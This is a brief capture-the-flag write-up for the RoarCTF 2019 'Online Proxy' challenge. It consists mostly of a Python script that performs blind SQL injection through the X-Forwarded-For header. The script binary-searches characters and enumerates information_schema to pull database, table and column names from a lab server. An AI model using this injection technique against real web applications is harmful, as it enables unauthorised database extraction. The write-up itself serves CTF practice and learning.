[RoarCTF 2019]Online Proxy

[RoarCTF 2019]Online Proxy

恶心坏了111

import requests
url = "http://node3.buuoj.cn:27220/"
def exe_sql(sql_str):
	result = ""
	i = 0
	while(True):
		head = 32
		tail = 127
		i += 1
		while(head<tail):
			mid = head + tail >> 1
			payload = "0'or ascii(substr(("+sql_str+"),%d,1))>%d or '0" % (i,mid)
			headers={"X-Forwarded-For":payload}
			#print(headers)
			#print(payload)
			headers1={"X-Forwarded-For":"233"}
			s = requests.Session()
			r = s.get(url,headers=headers)
			r = s.get(url,headers=headers1)
			r = s.get(url,headers=headers1)
			#print(r.text)
			if("Last Ip: 1 " in r.text):
				head = mid + 1
			else :
				tail = mid
		if(head!=32):
			result += chr(head)
			print(result)
		else:
			break
			
#exe_sql("select database()")#ctf
#exe_sql("select group_concat(schema_name) from information_schema.schemata")#F4l9_D4t4B45e

#exe_sql("select group_concat(table_name) from information_schema.tables where table_schema=database()") #ip_log

#exe_sql("select group_concat(table_name) from information_schema.tables where table_schema='F4l9_D4t4B45e'")#F4l9_t4b1e
#exe_sql("select group_concat(column_name) from information_schema.columns where table_schema='F4l9_D4t4B45e' and table_name='F4l9_t4b1e'")#
exe_sql("select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e")#F4l9_C01uMn

image-20200806003804417

posted @ 2020-08-06 00:40  何止(h3zh1)  阅读(291)  评论(0编辑  收藏  举报